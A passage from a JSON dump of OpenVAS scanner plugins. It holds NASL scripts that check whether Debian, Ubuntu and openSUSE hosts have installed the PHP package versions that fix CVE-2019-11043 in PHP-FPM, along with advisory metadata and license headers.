rpm:\"php7-pdo-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pgsql\", rpm:\"php7-pgsql~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pgsql-debuginfo\", rpm:\"php7-pgsql-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-phar\", rpm:\"php7-phar~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-phar-debuginfo\", rpm:\"php7-phar-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-posix\", rpm:\"php7-posix~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-posix-debuginfo\", rpm:\"php7-posix-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-readline\", rpm:\"php7-readline~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-readline-debuginfo\", rpm:\"php7-readline-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-shmop\", rpm:\"php7-shmop~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-shmop-debuginfo\", rpm:\"php7-shmop-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-snmp\", rpm:\"php7-snmp~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-snmp-debuginfo\", rpm:\"php7-snmp-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-soap\", rpm:\"php7-soap~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-soap-debuginfo\", rpm:\"php7-soap-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sockets\", rpm:\"php7-sockets~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sockets-debuginfo\", rpm:\"php7-sockets-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sodium\", rpm:\"php7-sodium~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sodium-debuginfo\", rpm:\"php7-sodium-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sqlite\", rpm:\"php7-sqlite~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sqlite-debuginfo\", rpm:\"php7-sqlite-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sysvmsg\", rpm:\"php7-sysvmsg~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sysvmsg-debuginfo\", rpm:\"php7-sysvmsg-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sysvsem\", rpm:\"php7-sysvsem~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sysvsem-debuginfo\", rpm:\"php7-sysvsem-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sysvshm\", rpm:\"php7-sysvshm~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sysvshm-debuginfo\", rpm:\"php7-sysvshm-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-test\", rpm:\"php7-test~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-tidy\", rpm:\"php7-tidy~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-tidy-debuginfo\", rpm:\"php7-tidy-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-tokenizer\", rpm:\"php7-tokenizer~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-tokenizer-debuginfo\", rpm:\"php7-tokenizer-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-wddx\", rpm:\"php7-wddx~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-wddx-debuginfo\", rpm:\"php7-wddx-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xmlreader\", rpm:\"php7-xmlreader~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xmlreader-debuginfo\", rpm:\"php7-xmlreader-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xmlrpc\", rpm:\"php7-xmlrpc~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xmlrpc-debuginfo\", rpm:\"php7-xmlrpc-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xmlwriter\", rpm:\"php7-xmlwriter~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xmlwriter-debuginfo\", rpm:\"php7-xmlwriter-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xsl\", rpm:\"php7-xsl~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xsl-debuginfo\", rpm:\"php7-xsl-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-zip\", rpm:\"php7-zip~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-zip-debuginfo\", rpm:\"php7-zip-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-zlib\", rpm:\"php7-zlib~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-zlib-debuginfo\", rpm:\"php7-zlib-debuginfo~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pear\", rpm:\"php7-pear~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pear-Archive_Tar\", rpm:\"php7-pear-Archive_Tar~7.2.5~lp150.2.29.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-06T12:20:30", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-10-30T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 4552-1 (php7.0 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11043"], "modified": "2019-10-30T00:00:00", "id": "OPENVAS:1361412562310704552", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704552", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704552\");\n script_version(\"2019-10-30T03:00:10+0000\");\n script_cve_id(\"CVE-2019-11043\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-10-30 03:00:10 +0000 (Wed, 30 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-10-30 03:00:10 +0000 (Wed, 30 Oct 2019)\");\n script_name(\"Debian Security Advisory DSA 4552-1 (php7.0 - security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2019/dsa-4552.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DSA-4552-1\");\n script_xref(name:\"URL\", value:\"https://github.com/neex/phuip-fpizdam\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php7.0'\n package(s) announced via the DSA-4552-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Emil Lerner and Andrew Danau discovered that insufficient validation\nin the path handling code of PHP FPM could result in the execution of\narbitrary code in some setups.\");\n\n script_tag(name:\"affected\", value:\"'php7.0' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For the oldstable distribution (stretch), this problem has been fixed\nin version 7.0.33-0+deb9u6.\n\nWe recommend that you upgrade your php7.0 packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libapache2-mod-php7.0\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libphp7.0-embed\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-bcmath\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-bz2\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-cgi\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-cli\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-common\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-curl\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-dba\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-dev\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-enchant\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-fpm\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-gd\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-gmp\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-imap\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-interbase\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-intl\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-json\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-ldap\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-mbstring\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-mcrypt\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-mysql\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-odbc\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-opcache\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-pgsql\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-phpdbg\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-pspell\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-readline\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-recode\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-snmp\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-soap\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-sqlite3\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-sybase\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-tidy\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-xml\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-xmlrpc\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-xsl\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-zip\", ver:\"7.0.33-0+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-06T12:20:30", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-10-30T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 4553-1 (php7.3 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11043"], "modified": "2019-10-30T00:00:00", "id": "OPENVAS:1361412562310704553", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704553", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704553\");\n script_version(\"2019-10-30T03:00:07+0000\");\n script_cve_id(\"CVE-2019-11043\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-10-30 03:00:07 +0000 (Wed, 30 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-10-30 03:00:07 +0000 (Wed, 30 Oct 2019)\");\n script_name(\"Debian Security Advisory DSA 4553-1 (php7.3 - security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB10\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2019/dsa-4553.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DSA-4553-1\");\n script_xref(name:\"URL\", value:\"https://github.com/neex/phuip-fpizdam\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php7.3'\n package(s) announced via the DSA-4553-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Emil Lerner and Andrew Danau discovered that insufficient validation\nin the path handling code of PHP FPM could result in the execution of\narbitrary code in some setups.\");\n\n script_tag(name:\"affected\", value:\"'php7.3' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For the stable distribution (buster), this problem has been fixed in\nversion 7.3.11-1~deb10u1.\n\nWe recommend that you upgrade your php7.3 packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libapache2-mod-php7.3\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libphp7.3-embed\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.3\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.3-bcmath\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.3-bz2\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.3-cgi\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.3-cli\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.3-common\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.3-curl\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.3-dba\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.3-dev\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.3-enchant\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.3-fpm\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.3-gd\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.3-gmp\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.3-imap\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.3-interbase\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.3-intl\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.3-json\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.3-ldap\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.3-mbstring\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.3-mysql\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.3-odbc\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.3-opcache\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.3-pgsql\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.3-phpdbg\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.3-pspell\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.3-readline\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.3-recode\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.3-snmp\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.3-soap\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.3-sqlite3\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.3-sybase\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.3-tidy\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.3-xml\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.3-xmlrpc\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.3-xsl\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.3-zip\", ver:\"7.3.11-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T14:46:27", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-10-29T00:00:00", "type": "openvas", "title": "Ubuntu Update for php7.3 USN-4166-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11043"], "modified": "2019-12-12T00:00:00", "id": "OPENVAS:1361412562310844212", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310844212", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# 